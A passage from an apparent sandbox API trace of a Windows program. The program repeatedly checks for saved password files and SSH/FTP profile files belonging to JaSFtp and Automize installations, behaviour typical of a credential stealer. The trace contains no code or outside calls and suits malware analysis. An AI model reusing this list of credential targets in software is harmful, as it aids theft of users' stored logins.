(lpLibFileName="user32") returned 0x750d0000 [0244.313] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0244.313] GetProcessHeap () returned 0x740000 [0244.313] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.313] GetProcessHeap () returned 0x740000 [0244.313] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.314] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.314] GetProcessHeap () returned 0x740000 [0244.315] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.354] GetProcessHeap () returned 0x740000 [0244.354] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.355] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.355] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0244.356] GetProcessHeap () returned 0x740000 [0244.356] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x56) returned 0x75a488 [0244.356] GetProcessHeap () returned 0x740000 [0244.356] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.418] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0244.419] GetProcessHeap () returned 0x740000 [0244.419] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.419] GetProcessHeap () returned 0x740000 [0244.419] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.420] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.421] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0244.421] GetProcessHeap () returned 0x740000 [0244.421] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.421] GetProcessHeap () returned 0x740000 [0244.421] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.422] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.422] GetProcessHeap () returned 0x740000 [0244.422] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.422] GetProcessHeap () returned 0x740000 [0244.422] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.423] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.424] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0244.424] GetProcessHeap () returned 0x740000 [0244.424] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75a488 [0244.424] GetProcessHeap () returned 0x740000 [0244.424] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.425] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.425] GetProcessHeap () returned 0x740000 [0244.425] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.426] GetProcessHeap () returned 0x740000 [0244.426] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.427] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.432] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0244.432] GetProcessHeap () returned 0x740000 [0244.432] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0244.432] GetProcessHeap () returned 0x740000 [0244.433] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.435] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0244.435] GetProcessHeap () returned 0x740000 [0244.436] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.436] GetProcessHeap () returned 0x740000 [0244.436] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.436] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.437] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0244.437] GetProcessHeap () returned 0x740000 [0244.437] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.437] GetProcessHeap () returned 0x740000 [0244.438] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.438] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.439] GetProcessHeap () returned 0x740000 [0244.439] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.439] GetProcessHeap () returned 0x740000 [0244.439] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.440] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.441] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0244.441] GetProcessHeap () returned 0x740000 [0244.441] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.441] GetProcessHeap () returned 0x740000 [0244.442] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.482] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.483] GetProcessHeap () returned 0x740000 [0244.483] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.484] GetProcessHeap () returned 0x740000 [0244.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.485] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.486] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0244.486] GetProcessHeap () returned 0x740000 [0244.486] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0244.486] GetProcessHeap () returned 0x740000 [0244.487] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.488] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0244.488] GetProcessHeap () returned 0x740000 [0244.488] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.489] GetProcessHeap () returned 0x740000 [0244.489] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.490] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.490] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0244.490] GetProcessHeap () returned 0x740000 [0244.491] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.491] GetProcessHeap () returned 0x740000 [0244.491] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.492] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.493] GetProcessHeap () returned 0x740000 [0244.493] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.493] GetProcessHeap () returned 0x740000 [0244.493] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.495] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.496] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0244.496] GetProcessHeap () returned 0x740000 [0244.496] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.535] GetProcessHeap () returned 0x740000 [0244.536] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.537] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.537] GetProcessHeap () returned 0x740000 [0244.538] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.538] GetProcessHeap () returned 0x740000 [0244.538] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.539] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.540] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0244.540] GetProcessHeap () returned 0x740000 [0244.540] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0244.540] GetProcessHeap () returned 0x740000 [0244.540] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.542] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0244.542] GetProcessHeap () returned 0x740000 [0244.542] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.542] GetProcessHeap () returned 0x740000 [0244.542] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.543] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.544] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0244.544] GetProcessHeap () returned 0x740000 [0244.544] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.544] GetProcessHeap () returned 0x740000 [0244.545] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.546] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.546] GetProcessHeap () returned 0x740000 [0244.546] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.546] GetProcessHeap () returned 0x740000 [0244.547] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.548] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.548] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0244.549] GetProcessHeap () returned 0x740000 [0244.549] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.549] GetProcessHeap () returned 0x740000 [0244.549] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.550] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.550] GetProcessHeap () returned 0x740000 [0244.551] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.551] GetProcessHeap () returned 0x740000 [0244.551] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.551] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.552] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0244.552] GetProcessHeap () returned 0x740000 [0244.552] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0244.552] GetProcessHeap () returned 0x740000 [0244.553] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.554] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0244.554] GetProcessHeap () returned 0x740000 [0244.554] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.554] GetProcessHeap () returned 0x740000 [0244.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.591] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.592] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0244.592] GetProcessHeap () returned 0x740000 [0244.592] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.592] GetProcessHeap () returned 0x740000 [0244.592] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.593] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.593] GetProcessHeap () returned 0x740000 [0244.594] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.594] GetProcessHeap () returned 0x740000 [0244.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.595] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.596] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0244.596] GetProcessHeap () returned 0x740000 [0244.596] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.596] GetProcessHeap () returned 0x740000 [0244.596] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.598] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.598] GetProcessHeap () returned 0x740000 [0244.598] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.598] GetProcessHeap () returned 0x740000 [0244.598] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.599] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.600] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0244.600] GetProcessHeap () returned 0x740000 [0244.601] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x58) returned 0x75a488 [0244.601] GetProcessHeap () returned 0x740000 [0244.601] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.602] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0244.602] GetProcessHeap () returned 0x740000 [0244.603] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.603] GetProcessHeap () returned 0x740000 [0244.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.604] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.605] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0244.605] GetProcessHeap () returned 0x740000 [0244.605] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.641] GetProcessHeap () returned 0x740000 [0244.642] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.644] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.644] GetProcessHeap () returned 0x740000 [0244.645] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.645] GetProcessHeap () returned 0x740000 [0244.645] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.646] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.647] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0244.647] GetProcessHeap () returned 0x740000 [0244.647] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75a488 [0244.647] GetProcessHeap () returned 0x740000 [0244.647] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.649] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.649] GetProcessHeap () returned 0x740000 [0244.649] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.649] GetProcessHeap () returned 0x740000 [0244.649] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.650] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.651] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0244.651] GetProcessHeap () returned 0x740000 [0244.651] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.651] GetProcessHeap () returned 0x740000 [0244.651] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.653] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0244.653] GetProcessHeap () returned 0x740000 [0244.653] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.653] GetProcessHeap () returned 0x740000 [0244.653] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.654] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.655] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.655] GetProcessHeap () returned 0x740000 [0244.655] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.655] GetProcessHeap () returned 0x740000 [0244.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.657] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.657] GetProcessHeap () returned 0x740000 [0244.657] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.657] GetProcessHeap () returned 0x740000 [0244.657] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.658] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.659] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.659] GetProcessHeap () returned 0x740000 [0244.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.659] GetProcessHeap () returned 0x740000 [0244.660] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.661] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.661] GetProcessHeap () returned 0x740000 [0244.661] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.661] GetProcessHeap () returned 0x740000 [0244.661] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.662] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.663] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0244.663] GetProcessHeap () returned 0x740000 [0244.663] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.663] GetProcessHeap () returned 0x740000 [0244.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.665] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0244.665] GetProcessHeap () returned 0x740000 [0244.666] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.666] GetProcessHeap () returned 0x740000 [0244.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.667] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.668] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.668] GetProcessHeap () returned 0x740000 [0244.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.668] GetProcessHeap () returned 0x740000 [0244.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.669] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.669] GetProcessHeap () returned 0x740000 [0244.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.670] GetProcessHeap () returned 0x740000 [0244.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.671] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.708] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.708] GetProcessHeap () returned 0x740000 [0244.708] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.708] GetProcessHeap () returned 0x740000 [0244.709] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.710] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.710] GetProcessHeap () returned 0x740000 [0244.711] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.711] GetProcessHeap () returned 0x740000 [0244.711] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.712] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.713] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0244.713] GetProcessHeap () returned 0x740000 [0244.713] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5a) returned 0x75a488 [0244.713] GetProcessHeap () returned 0x740000 [0244.713] HeapFree (in: hHeap=0x740000, 